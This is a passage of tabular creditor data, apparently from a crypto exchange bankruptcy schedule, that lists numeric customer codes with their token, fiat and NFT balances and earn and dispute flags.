| 07344724 | | BF_POINT[200], BRZ[1], CUSDT[7], DOGE[3], NFT (339174076232768068/FTX Planet #22)[1], NFT (383157489498428010/FTX Planet #16)[1], NFT (390820751849739830/Marilyn)[1], NFT (429585758576306653/CryptoManchos #3)[1], NFT (453634331647163697/FTX Planet #24)[1], NFT (470957408972627258/CryptoManchos #9)[1], NFT (491394622658175325/FTX Planet #11)[1], NFT (496739952171531183/FTX Planet #21)[1], NFT (499469343775105130/FTX Planet #19)[1], NFT (503246205705888462/FTX - Off The Grid Miami #4065)[1], NFT (528877359875300521/Bahrain Ticket Stub #2478)[1], TRX[1], USD[4.43] | Yes | |
| 07344725 | | USD[0.49] | | |
| 07344726 | | USD[10.00] | | |
| 07344727 | | GRT[0], USD[0.01] | | |
| 07344728 | | BRZ[2], CUSDT[1], TRX[2], USD[0.08] | | |
| 07344729 | | BAT[9.08677432], BRZ[1], BTC[.00075653], CUSDT[4], DOGE[239.84844391], LINK[.03791217], LTC[.0583741], SUSHI[1.16448421], TRX[3], UNI[1.10636341], USD[0.61] | Yes | |
| 07344730 | | BF_POINT[100], BRZ[2], BTC[0.02783263], CUSDT[5], DOGE[13005.00004974], ETH[0.89910653], ETHW[0.89910653], SHIB[32489.87765759], SOL[.65700067], TRX[12.29316949], USD[0.01] | | |
| 07344731 | | USD[10.00] | | |
| 07344732 | | BRZ[0], BTC[0], DOGE[0], ETH[.00000001], USD[0.00] | | |
| 07344734 | | BRZ[1], TRX[1], USD[0.86] | | |
| 07344735 | | USD[10.00] | | |
| 07344736 | | USD[10.00] | | |
| 07344737 | | BCH[0], CUSDT[1], DOGE[2.00000416], TRX[.000002], USD[0.31] | | |
| 07344738 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344739 | | BRZ[1], CUSDT[1], DOGE[1], TRX[4], USD[0.00], USDT[.00009296] | | |
| 07344740 | | BRZ[1], CUSDT[1], DOGE[7], ETH[0], USD[0.00] | | |
| 07344741 | | BAT[1], BRZ[1], DOGE[.00004177], GRT[1], USD[0.00] | | |
| 07344742 | | SHIB[3600656.35879926], USD[0.12], USDT[0] | | |
| 07344743 | | USD[10.00] | | |
| 07344744 | | USD[10.00] | | |
| 07344745 | | USD[10.00] | | |
| 07344746 | | USD[10.00] | | |
| 07344747 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07344748 | | USD[10.00] | | |
| 07344751 | | BAT[1], BRZ[2], CUSDT[5], GRT[1], USD[0.01] | | |
| 07344752 | | DOGE[.905], USD[0.00] | | |
| 07344753 | | USD[10.00] | | |
| 07344754 | | USD[10.00] | | |
| 07344755 | | BTC[.00028817], USD[11.08] | Yes | |
| 07344756 | | USD[10.00] | | |
| 07344757 | | USD[10.00] | | |
| 07344758 | | USD[10.00] | | |
| 07344759 | | AAVE[.00009926], CUSDT[21], DOGE[1], GRT[748.57967471], SUSHI[20.37965288], TRX[4], USD[107.42] | Yes | |
| 07344760 | | USD[0.00] | | |
| 07344761 | | TRX[1], USD[35.52] | | |
| 07344762 | | USD[10.00] | | |
| 07344763 | | CUSDT[3], DOGE[.00079735], USD[0.01] | | |
| 07344764 | | DOGE[16.15845889], USD[0.00] | | |
| 07344765 | | DOGE[3526.91426805], USD[0.00] | | |
| 07344768 | | TRX[181.52800105], USD[0.00] | | |
| 07344769 | | USD[0.00] | | |
| 07344770 | | CUSDT[2351.01447577], DOGE[212.52086647], TRX[3], USD[0.16], USDT[1] | | |
| 07344771 | | DOGE[16.46119474], USD[0.00] | | |
| 07344772 | | USD[10.00] | | |
| 07344773 | | DOGE[20.42446193], USD[0.00] | | |
| 07344774 | | DOGE[154.37355632], USD[0.01] | | |
| 07344775 | | CUSDT[1], DOGE[838.44088687], LINK[.32424955], USD[0.00] | | |
| 07344776 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07344777 | | USD[10.00] | | |
| 07344778 | | USD[0.00] | | |
| 07344779 | | USD[0.00] | | |
| 07344780 | | USD[0.00] | | |
| 07344781 | | BTC[.00042279], CUSDT[1], TRX[1], USD[0.00] | | |
| 07344782 | | CUSDT[3], DOGE[70.42750902], USD[0.00] | | |
| 07344783 | | GRT[10.02310465], USD[0.00] | | |
| 07344785 | | USD[10.00] | | |
| 07344786 | | USD[10.00] | | |
| 07344787 | | CUSDT[3], DOGE[154.06638632], TRX[2], USD[45.83] | | |
| 07344788 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07344789 | | DOGE[1], SOL[0.05693104], TRX[1], USD[0.00] | Yes | |
| 07344790 | | BRZ[3], BTC[0.00457238], CUSDT[26], DOGE[6], ETH[0.00001064], ETHW[0], MATIC[0.00000001], SHIB[50], SOL[0], TRX[327.73907013], USD[0.00] | Yes | |
| 07344791 | | DOGE[0], USD[0.70] | | |
| 07344792 | | USD[10.00] | | |
| 07344793 | | USD[10.00] | | |
| 07344794 | | SHIB[165849.44392449], USD[0.00] | Yes | |
| 07344795 | | BRZ[1], BTC[0], CUSDT[2], DOGE[0], ETH[.00000001], ETHW[0], LTC[0], TRX[1], USD[0.01], USDT[1.10787857] | Yes | |
| 07344796 | | USD[10.00] | | |
| 07344797 | | DOGE[138.69225409], USD[0.00] | | |
| 07344798 | | BF_POINT[2600], BRZ[1], BTC[.48730873], DOGE[66722.4846787], ETH[.15736174], ETHW[.1567995], LINK[1.09281214], SHIB[2], SOL[2.12185269], SUSHI[146.67841], TRX[2.00000006], USD[1401.72], USDT[1.02218223] | Yes | |
| 07344799 | | BTC[.00158139], CUSDT[20], DOGE[6], ETH[0.02947331], ETHW[0.02947331], GRT[52.39174737], MKR[0], PAXG[0], SHIB[2706432.89994131], SOL[0], TRX[1], USD[0.00] | | |
| 07344800 | | BAT[.00045036], BRZ[1], CUSDT[368.44957345], DOGE[1], TRX[221.58188023], USD[0.00], USDT[26.95765591] | Yes | |
| 07344801 | | BAT[1.01655549], DOGE[2326.77251387], TRX[1], UNI[25.85376328], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344803 | | USD[10.00] | | |
| 07344805 | | USD[10.00] | | |
| 07344806 | | CUSDT[1], DOGE[.00695561], TRX[1], USD[0.00] | | |
| 07344808 | | BRZ[1], CUSDT[1], DOGE[6.18978816], TRX[2], USD[0.00] | Yes | |
| 07344809 | | BRZ[1], USD[0.00] | Yes | |
| 07344810 | | USD[10.83] | Yes | |
| 07344811 | | USD[10.00] | | |
| 07344812 | | USD[0.01], USDT[0] | | |
| 07344813 | | BCH[.02131943], BRZ[1], BTC[.00080758], CUSDT[11], DOGE[4.72304421], ETH[.00378208], ETHW[.00374104], GRT[.00008665], MATIC[13.37368485], TRX[110.53586136], USD[0.01], USDT[0.00006126] | Yes | |
| 07344814 | | USD[10.00] | | |
| 07344815 | | USD[10.00] | | |
| 07344816 | | DOGE[0], SHIB[14053.75394427], SOL[0], USD[0.00] | Yes | |
| 07344817 | | USD[10.00] | | |
| 07344818 | | BRZ[2], CUSDT[1], DOGE[1], TRX[676.98781923], USD[0.00] | | |
| 07344819 | | BRZ[1], BTC[.00014463], USD[0.01] | | |
| 07344820 | | BTC[0], DOGE[0], USD[0.00], USDT[0.01238930] | Yes | |
| 07344821 | | CUSDT[471.05961207], DOGE[2001.53446703], GRT[1], TRX[1009.73791242], USD[20.00] | | |
| 07344822 | | USD[10.00] | | |
| 07344823 | | BCH[0], BRZ[0], BTC[0], DOGE[362.54915459], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07344824 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07344825 | | USD[10.00] | | |
| 07344826 | | BCH[.00494494], BRZ[5.07952967], BTC[.00000037], CUSDT[14], DOGE[1570.00233009], ETH[.00005356], ETHW[.00005356], LINK[.00002236], SHIB[1], TRX[3], USD[0.01], USDT[2.14346713] | Yes | |
| 07344827 | | USD[10.00] | | |
| 07344829 | | USD[10.00] | | |
| 07344830 | | BRZ[1], CUSDT[6], DOGE[1], TRX[257.95267258], USD[0.00] | | |
| 07344831 | | USD[10.00] | | |
| 07344832 | | USD[10.00] | | |
| 07344833 | | DOGE[1.00001832], USD[0.68] | | |
| 07344834 | | DOGE[126.492], SUSHI[14.985], UNI[10.6572], USD[0.03] | | |
| 07344835 | | USD[10.00] | | |
| 07344836 | | USD[10.00] | | |
| 07344837 | | USD[10.00] | | |
| 07344838 | | USD[10.00] | | |
| 07344839 | | USD[10.00] | | |
| 07344840 | | USD[10.00] | | |
| 07344841 | | USD[10.00] | | |
| 07344842 | | DOGE[1], USD[0.26] | | |
| 07344843 | | CUSDT[3], DOGE[24074.71759121], TRX[1], USD[0.00] | | |
| 07344844 | | BAT[112.52305256], BCH[1.89301262], BRZ[4], BTC[.00354602], CUSDT[18], DOGE[5255.99949907], GRT[147.96851891], KSHIB[921.5361908], LINK[7.75459796], LTC[2.33849925], MATIC[122.09153147], SHIB[741892.11745217], TRX[6], USD[0.00] | Yes | |
| 07344845 | Contingent, Disputed | USD[11.09] | Yes | |
| 07344846 | | USD[10.00] | | |
| 07344847 | | USD[10.00] | | |
| 07344848 | | USD[10.00] | | |
| 07344849 | | USD[10.00] | | |
| 07344850 | | CUSDT[1], SUSHI[6.39928772], TRX[714.30740412], USD[0.00] | | |
| 07344852 | | DOGE[70.4360371], USD[0.00] | | |
| 07344853 | | USD[10.00] | | |
| 07344854 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07344855 | | USD[10.00] | | |
| 07344857 | | USD[10.00] | | |
| 07344858 | | DOGE[194.12378131], SOL[.51078427], USD[0.00] | Yes | |
| 07344859 | | BAT[2], BRZ[1], CUSDT[1], LINK[1], TRX[2], USD[0.00] | | |
| 07344860 | | USD[10.00] | | |
| 07344861 | | USD[10.00] | | |
| 07344862 | | USD[0.00] | | |
| 07344863 | | USD[10.00] | | |
| 07344864 | | BRZ[1], CUSDT[3], DOGE[1.36410476], TRX[1], USD[0.00] | | |
| 07344866 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344867 | | BAT[76.92685], BTC[.00299715], DOGE[3857.09617015], USD[0.07] | | |
| 07344868 | | DOGE[1], USD[0.01] | | |
| 07344869 | | BRZ[5], CUSDT[18], DOGE[1], USD[4.32], USDT[0] | | |
| 07344870 | | USD[10.00] | | |
| 07344871 | | DAI[9.95800629], DOGE[1], USD[0.00] | | |
| 07344872 | | BAT[.12743218], BRZ[1], BTC[.00001737], CUSDT[5], DOGE[.00001723], GRT[2.51104228], SUSHI[.00667911], TRX[2.22067483], USD[0.66] | | |
| 07344873 | | USD[10.00] | | |
| 07344874 | | CUSDT[2], SHIB[290929.05574019], USD[0.00] | Yes | |
| 07344875 | | USD[10.00] | | |
| 07344877 | | USD[0.01] | | |
| 07344878 | | USD[10.00] | | |
| 07344879 | | DOGE[1], USD[0.00] | | |
| 07344880 | | CUSDT[2], DOGE[.97896504], SHIB[4], USD[36.20] | | |
| 07344881 | | USD[10.00] | | |
| 07344882 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07344883 | | USD[10.00] | | |
| 07344884 | | BAT[1], USD[0.00] | | |
| 07344885 | | USD[10.00] | | |
| 07344886 | | BAT[1], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07344887 | | BAT[2], CUSDT[2], DOGE[.07398452], GRT[3], TRX[6], USD[0.89], USDT[2] | | |
| 07344888 | | USD[10.00] | | |
| 07344889 | | BRZ[1], CUSDT[10], DOGE[1.00078647], SHIB[1880402.95971169], TRX[5], USD[3.09] | | |
| 07344890 | | USD[10.00] | | |
| 07344892 | | BRZ[3], USD[0.00] | | |
| 07344893 | | CUSDT[4], ETH[.00293882], ETHW[.00289778], SUSHI[.0000083], USD[0.00] | Yes | |
| 07344894 | | USD[10.00] | | |
| 07344895 | | CUSDT[10], TRX[2], USD[0.00] | Yes | |
| 07344896 | | USD[10.00] | | |
| 07344897 | | GRT[4.55261458], USD[0.00] | | |
| 07344898 | | USD[10.00] | | |
| 07344899 | | USD[10.00] | | |
| 07344900 | | CUSDT[1], DOGE[2076.90802034], USD[0.00] | | |
| 07344901 | | USD[10.00] | | |
| 07344902 | | USD[0.00] | | |
| 07344903 | | DOGE[202.21269366], USD[10.00] | | |
| 07344904 | | BAT[2.11396349], BF_POINT[100], BRZ[4], CUSDT[5], DOGE[3], GRT[2.05019409], LINK[6.15463562], SHIB[1], SOL[.00097519], TRX[6], USD[0.00], USDT[2.186965] | Yes | |
| 07344905 | | USD[0.00], USDT[0] | | |
| 07344906 | | USD[0.00] | | |
| 07344907 | | BTC[.00070033], CUSDT[1], DOGE[944.11312795], USD[10.00] | | |
| 07344908 | | CUSDT[1], DOGE[47.63250652], TRX[1], USD[0.00] | | |
| 07344909 | | DOGE[0], USD[0.00] | | |
| 07344910 | | DOGE[.662], GRT[.59305112], USD[0.00] | | |
| 07344911 | | BAT[0], BTC[0], CUSDT[3], DOGE[1], ETH[0], ETHW[0], GBP[0.00], GRT[0], LTC[0], SHIB[13.49018463], SUSHI[0], TRX[2], USD[98.97], USDT[0] | Yes | |
| 07344912 | | CUSDT[1], USD[0.00] | | |
| 07344913 | | USD[10.00] | | |
| 07344914 | | BAT[1.0072821], CUSDT[2], DOGE[0], GRT[1], MATIC[1.00164518], TRX[4], USD[0.10], USDT[0] | Yes | |
| 07344915 | | BRZ[1], DOGE[4428.09965826], SUSHI[18.78972991], TRX[1], USD[98.94] | | |
| 07344916 | | DOGE[170.99554777], TRX[1], USD[0.00] | | |
| 07344917 | | USD[10.00] | | |
| 07344918 | | DOGE[1777.69152586], SHIB[11405867.63003718], USD[0.01], USDT[0] | | |
| 07344919 | | USD[10.00] | | |
| 07344920 | | BAT[1.01643821], BRZ[4], BTC[.0044436], CUSDT[2376.88050054], ETH[.20289717], ETHW[.20667994], GRT[1.00472975], LTC[.90979194], SHIB[1029221.35321028], TRX[968.44677264], USD[0.01] | Yes | |
| 07344921 | | DOGE[4], GRT[2], SOL[0], SUSHI[0], TRX[206.25253088], USD[0.00], USDT[0] | | |
| 07344922 | | BRZ[1], USD[0.00] | | |
| 07344923 | | BTC[0.00008027], SOL[.001832], USD[0.00] | | |
| 07344924 | | TRX[208.00170062], USD[0.00] | | |
| 07344925 | | BTC[.00059976], DOGE[757.71346024], ETH[.01286603], ETHW[.01286603], SOL[3.26177007], USD[0.00] | | |
| 07344926 | | CUSDT[10], TRX[2], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344927 | | USD[10.00] | | |
| 07344928 | | BRZ[1], BTC[.00000156], ETH[.00002049], ETHW[.00002049], USD[0.00], USDT[1.02543197] | Yes | |
| 07344929 | | USD[10.00] | | |
| 07344930 | | USD[0.00] | Yes | |
| 07344931 | | USD[0.00] | | |
| 07344932 | | DOGE[139.7311963], USD[0.00] | | |
| 07344933 | | USD[10.00] | | |
| 07344934 | | DOGE[.00002181], TRX[2], USD[10.00] | | |
| 07344935 | | USD[0.00], USDT[0] | | |
| 07344936 | | USD[35.00] | | |
| 07344937 | | BRZ[1], CUSDT[1], DOGE[0], GRT[0], TRX[1], USD[0.01], USDT[0] | | |
| 07344938 | | USD[10.00] | | |
| 07344939 | | TRX[1], USD[0.00] | | |
| 07344940 | | DOGE[137.73133354], USD[0.00] | | |
| 07344941 | | BRZ[1], CUSDT[5], DOGE[367.7436986], TRX[3], USD[1.78] | | |
| 07344942 | | USD[10.00] | | |
| 07344943 | | USD[10.00] | | |
| 07344944 | | USD[10.00] | | |
| 07344945 | | BRZ[1], DOGE[.65894878], USD[0.00] | | |
| 07344946 | | ETH[.00036003], ETHW[.00036003], USD[0.01] | | |
| 07344947 | | AVAX[1.08036058], BAT[147.52086273], BRZ[1], BTC[.01137624], CUSDT[3], DOGE[3087.9082718], ETH[.02626043], ETHW[.02593187], LTC[.30356096], SHIB[1675470.48552055], SOL[1.10968002], TRX[258.61226475], USD[10.31] | Yes | |
| 07344948 | | USD[10.00] | | |
| 07344949 | | DOGE[0], ETH[.01796485], LTC[0], SHIB[0], SOL[.17556425], USD[0.29], USDT[0] | | |
| 07344950 | | DOGE[1161.36470356], SHIB[0], USD[0.00] | Yes | |
| 07344951 | | BTC[.00010332], CUSDT[1], DOGE[39.29363938], USD[30.68] | | |
| 07344952 | | USD[10.00] | | |
| 07344953 | | DOGE[.00000049], TRX[1], USD[0.17] | | |
| 07344954 | | BRZ[1], GRT[1], TRX[175.45932873], USD[0.01] | | |
| 07344955 | | CUSDT[3], DOGE[6.76896334], USD[0.00] | Yes | |
| 07344957 | | USD[10.00] | | |
| 07344960 | | BCH[.05988307], BTC[.00083567], CUSDT[1], DAI[9.9470557], DOGE[730.74527964], KSHIB[1333.25653775], MATIC[35.71751253], SUSHI[3.18484607], TRX[1054.17865285], USD[0.01] | | |
| 07344961 | | USD[10.00] | | |
| 07344962 | | USD[10.00] | | |
| 07344963 | | USD[10.00] | | |
| 07344964 | | BTC[.00073589], CUSDT[501.05659549], DOGE[26.94546619], ETH[.09800955], ETHW[.09698776], GRT[55.19646264], USD[0.12] | Yes | |
| 07344965 | | BF_POINT[400], BTC[.00000038], NFT (290699862368724211/FTX - Off The Grid Miami #4620)[1], SHIB[1], USD[3206.81], USDT[0.00000779] | Yes | |
| 07344966 | | USD[10.00] | | |
| 07344967 | | CUSDT[1], DOGE[2536.71707715], USD[10.00] | | |
| 07344968 | | CUSDT[1], USD[10.00], USDT[.60656648] | | |
| 07344969 | | CUSDT[1], DOGE[61.3256716], USD[0.00] | Yes | |
| 07344970 | | DOGE[146.60796092], USD[0.00] | | |
| 07344971 | | MATIC[7.50559334], USD[0.00] | Yes | |
| 07344972 | | USD[10.00] | | |
| 07344973 | | USD[10.00] | | |
| 07344974 | | CUSDT[4], USD[0.01] | Yes | |
| 07344975 | | USD[10.00] | | |
| 07344976 | | DOGE[147.78036329], USD[0.00] | Yes | |
| 07344977 | | USD[10.00] | | |
| 07344978 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07344979 | | DOGE[168.84999598], USD[0.00] | Yes | |
| 07344980 | | BRZ[1], CUSDT[9], TRX[2], USD[0.00] | Yes | |
| 07344981 | | BRZ[1], CUSDT[8], TRX[4], USD[0.15] | | |
| 07344982 | | BRZ[0], DOGE[0], SUSHI[0], USD[0.00] | | |
| 07344983 | | DOGE[162.59390611], USD[0.00] | | |
| 07344984 | | USD[10.00] | | |
| 07344985 | | DOGE[72.54049809], USD[0.00] | | |
| 07344986 | | TRX[1], USD[0.00] | | |
| 07344987 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344988 | | USD[10.00] | | |
| 07344989 | | USD[10.00] | | |
| 07344990 | | USD[10.00] | | |
| 07344991 | | USD[10.00] | | |
| 07344992 | | CUSDT[1], DOGE[1], TRX[0], USD[0.01] | | |
| 07344993 | | BAT[22.51525425], USD[0.00] | | |
| 07344994 | | USD[0.00] | | |
| 07344995 | | USD[10.00] | | |
| 07344996 | | TRX[1], USD[0.00] | | |
| 07344997 | | CUSDT[1], TRX[0], USD[0.00] | | |
| 07344998 | | USD[10.00] | | |
| 07344999 | | BTC[.00004168], DOGE[0], USD[0.00] | Yes | |
| 07345000 | | USD[10.00] | | |
| 07345001 | | SOL[.12933646], USD[0.00] | | |
| 07345002 | | CUSDT[3], SHIB[79621.18861019], USD[0.02] | Yes | |
| 07345003 | | CUSDT[2], USD[0.01] | Yes | |
| 07345004 | | USD[10.00] | | |
| 07345005 | | USD[10.00] | | |
| 07345006 | | BAT[0], BRZ[1], CUSDT[19], DOGE[1], ETH[.00000001], ETHW[0], GRT[0], SOL[0], SUSHI[0], TRX[0], USD[0.01] | | |
| 07345007 | | DOGE[0], LTC[0], SOL[1.26585925], SUSHI[0], USD[0.21] | | |
| 07345008 | | DOGE[4.04607134], USD[0.00], USDT[0] | | |
| 07345009 | | BTC[.00000679], DOGE[4], USD[0.27] | | |
| 07345010 | | USD[10.00] | | |
| 07345011 | | ETH[0], ETHW[0], UNI[0], USD[0.00] | | |
| 07345012 | | SUSHI[.60232024], USD[0.00] | | |
| 07345013 | | USD[10.00] | | |
| 07345015 | | USD[0.00] | | |
| 07345016 | | DOGE[1859.63586902], TRX[1], USD[10.00] | | |
| 07345018 | | USD[10.00] | | |
| 07345020 | | USD[10.00] | | |
| 07345021 | | DOGE[505.67409002], ETH[.00041454], ETHW[.00041454], NFT [47693911350298326/Space Bums #2419][1], NFT [547107318865451007/KAM1 #7799][1], SHIB[10514166.51086533], SOL[.04504096], TRX[1], USD[0.01] | Yes | |
| 07345022 | | CUSDT[1], GRT[2], LTC[.40286514], USD[0.00] | | |
| 07345023 | | USD[10.00] | | |
| 07345024 | | USD[10.00] | | |
| 07345025 | | BRZ[1], CUSDT[4], DOGE[221.7965314], SHIB[2], TRX[3], USD[0.96] | | |
| 07345026 | | DOGE[10073.11705], TRX[.6212], USD[2.45] | | |
| 07345027 | | DOGE[583.46742308], ETH[0], ETHW[0], KSHIB[2111.49598459], LTC[.00000736], USD[0.00], USDT[0.00001867] | Yes | |
| 07345029 | | SOL[0], SUSHI[0], UNI[0], USD[0.03] | | |
| 07345030 | | GRT[4.54717236], USD[0.00] | | |
| 07345031 | | BAT[0], BRZ[2], BTC[0], CUSDT[17], DOGE[1.00000051], ETH[0], LINK[0], LTC[0], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07345032 | | BTC[.00018225], USD[0.00] | | |
| 07345033 | | BAT[1], BRZ[2], CUSDT[3], DOGE[140.66840031], TRX[1], USD[0.00] | | |
| 07345034 | | DOGE[200.13019928], USD[0.00] | | |
| 07345035 | | USD[0.01], USDT[0] | | |
| 07345036 | | USD[10.00] | | |
| 07345037 | | BF_POINT[300], BRZ[7.55596462], CUSDT[28], DOGE[15449.51437339], ETH[1.7494746], ETHW[1.74873985], GRT[126.31018419], LINK[10.61161423], SHIB[5], TRX[1451.72320643], UNI[6.43393219], USD[0.06], USDT[11.04313897] | Yes | |
| 07345039 | | BRZ[2], BTC[.02794523], CUSDT[5], DOGE[2.00000689], GRT[1], KSHIB[16349.61875031], SHIB[16515142.46523927], TRX[1], USD[-200.00] | | |
| 07345040 | | BAT[23.08786184], DOGE[1.38813999], SUSHI[1.80420239], USD[0.00] | | |
| 07345041 | | USD[10.00] | | |
| 07345042 | | USD[10.00] | | |
| 07345043 | | USD[10.00] | | |
| 07345044 | | DOGE[5.08444919], GRT[5.4783346], USD[0.00] | Yes | |
| 07345045 | | CUSDT[1], TRX[1], USD[0.01], USDT[0.00000001] | | |
| 07345047 | | USD[0.01] | Yes | |
| 07345048 | | BTC[.00003574], DOGE[9.25674976], ETH[0], GRT[0], LINK[.25329169], USD[0.00] | Yes | |
| 07345049 | | BRZ[1], CUSDT[2], DOGE[20851.93221541], ETH[1.14640829], ETHW[1.14591621], NFT [366939766811912601/Red Panda #5351][1], SHIB[11381467.75555257], SOL[0], TRX[2], USD[0.00], USDT[1.07280172] | | |
| 07345051 | | CUSDT[3], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345052 | | BCH[0.00026198], CUSDT[12], DOGE[3522.38039612], ETH[1.06081005], ETHW[1.06036446], LINK[22.20894975], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07345053 | | BTC[0], DOGE[0.37640995], LTC[0], USD[0.00] | | |
| 07345054 | | USD[10.00] | | |
| 07345055 | | CUSDT[5], DOGE[248.44539443], USD[0.00] | | |
| 07345056 | | CUSDT[3], DOGE[1], SOL[33.22023821], SUSHI[0], TRX[2], USD[0.00], USDT[0.00000009] | Yes | |
| 07345057 | | BRZ[2], CUSDT[12], DAI[11.6716061], TRX[3], USD[83.92] | Yes | |
| 07345058 | | BRZ[1], CUSDT[1], DOGE[1], ETHW[.10318938], SHIB[1], TRX[1], USD[0.00] | | |
| 07345059 | | BRZ[1], BTC[.00000004], DOGE[491.9706679], USD[0.00] | | |
| 07345060 | | DOGE[1], USD[0.00] | Yes | |
| 07345061 | | USD[10.00] | | |
| 07345062 | | USD[10.00] | | |
| 07345063 | | USD[10.00] | | |
| 07345064 | | USD[10.00] | | |
| 07345065 | | USD[10.00] | | |
| 07345066 | | BF_POINT[300], USD[0.00] | | |
| 07345067 | | USD[0.01] | | |
| 07345068 | | CUSDT[6], DOGE[533.34034553], KSHIB[18.8861832], TRX[74.10130815], USD[0.00] | Yes | |
| 07345069 | | USD[10.00] | | |
| 07345070 | | CUSDT[1], DOGE[.03851027], TRX[1], USD[0.00], USDT[1.08334596] | Yes | |
| 07345071 | | CUSDT[9], DOGE[183.39260843], KSHIB[972.19748938], SHIB[1921281.29858626], SOL[1.54353909], USD[0.00] | Yes | |
| 07345072 | | USD[10.00] | | |
| 07345073 | | BAT[0.00001310], BTC[0.00008886], DOGE[0], USD[0.00] | | |
| 07345074 | | USD[10.00] | | |
| 07345075 | | DOGE[34.73586569], TRX[1], USD[0.00] | | |
| 07345076 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07345077 | | BCH[0], BTC[0], DOGE[0], ETH[0], LTC[0], SHIB[1], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07345079 | | CUSDT[2], DOGE[1], TRX[961.60991593], USD[0.80] | | |
| 07345080 | | TRX[76.05721236], USD[0.00] | | |
| 07345081 | | USD[10.00] | | |
| 07345082 | | DOGE[2], USD[0.00] | | |
| 07345083 | | USD[10.00] | | |
| 07345084 | | USD[10.00] | | |
| 07345085 | | DOGE[678.32298925], USD[10.00] | | |
| 07345086 | | USD[10.00] | | |
| 07345088 | | USD[10.00] | | |
| 07345090 | | USD[0.00] | | |
| 07345091 | | DOGE[8684.10685705], SHIB[138655.44503702], USD[0.00] | | |
| 07345093 | | USD[10.00] | | |
| 07345094 | | BAT[2], BRZ[4], CUSDT[7], GRT[1], TRX[11], USD[0.00], USDT[1] | | |
| 07345095 | | USD[0.00], USDT[0] | | |
| 07345096 | | GRT[5.50417545], USD[0.00] | Yes | |
| 07345098 | | USD[10.00] | | |
| 07345099 | | BTC[0], DOGE[0], ETH[0.00013443], ETHW[0.00013443], LTC[0], SOL[0], USD[0.01] | Yes | |
| 07345100 | | USD[10.00] | | |
| 07345101 | | CUSDT[1], USD[0.14] | | |
| 07345103 | | USD[0.01] | | |
| 07345104 | | DOGE[1], SUSHI[.7044933], USD[0.00] | | |
| 07345105 | | DOGE[1], USD[0.00] | | |
| 07345106 | | DAI[.00593098], USD[0.00] | Yes | |
| 07345107 | | DOGE[1], USD[0.00] | | |
| 07345108 | | USD[10.00] | | |
| 07345109 | | CUSDT[3], SUSHI[9.19714216], USD[0.00] | | |
| 07345110 | | DOGE[.21610702], USD[0.00] | | |
| 07345111 | | CUSDT[1], DOGE[1694.82097456], NFT (39208585923582496/Cyber Pharmacist 2697)[1], NFT (41032657452302809/Autumn 2021 #476)[1], NFT (542652259095597327/Megalodon Rogue Shark Tooth)[1], SOL[.32295492], USD[208.85] | Yes | |
| 07345112 | | BRZ[1], CUSDT[3], USD[0.00] | | |
| 07345113 | | BCH[0], BRZ[0], BTC[0], DOGE[0], KSHIB[32.67892438], SOL[0], USD[0.00], USDT[0] | | |
| 07345114 | | CUSDT[1], DOGE[382.63495354], USD[0.00] | | |
| 07345115 | | USD[10.90] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345116 | | BTC[.00018783], SHIB[1], TRX[1], USD[99.99] | | |
| 07345117 | | BTC[.00027001], USD[0.00] | | |
| 07345118 | | BTC[0.00077121], CUSDT[2], DOGE[144.39811544], USD[0.00] | Yes | |
| 07345119 | | USD[10.00] | | |
| 07345120 | | USD[10.00] | | |
| 07345121 | | USD[11.09] | Yes | |
| 07345123 | | CUSDT[1], SOL[0], TRX[.00156475], USD[0.00] | Yes | |
| 07345124 | | USD[10.00] | | |
| 07345125 | | DOGE[.00005856], USD[10.00] | | |
| 07345126 | | USD[10.00] | | |
| 07345127 | | BRZ[1], CUSDT[1], DOGE[.93777415], TRX[1], USD[0.00] | Yes | |
| 07345128 | | USD[10.00] | | |
| 07345129 | | USD[10.00] | | |
| 07345130 | | BRZ[3], CUSDT[1], DOGE[2], SOL[0], TRX[1], USD[11.30], USDT[1] | | |
| 07345131 | | BTC[0], DOGE[0.00022903] | | |
| 07345132 | | USD[0.00], USDT[9.93811417] | | |
| 07345134 | | USD[10.00] | | |
| 07345135 | | CUSDT[3.00011142], DOGE[4325.64295065], MATIC[34.62766967], TRX[1902.12189267], USD[0.00] | | |
| 07345136 | | DOGE[1], USD[0.00] | Yes | |
| 07345137 | | CUSDT[1], DOGE[.0000267], USD[0.01] | | |
| 07345138 | | DOGE[4.06376579], USD[0.00], USDT[0] | Yes | |
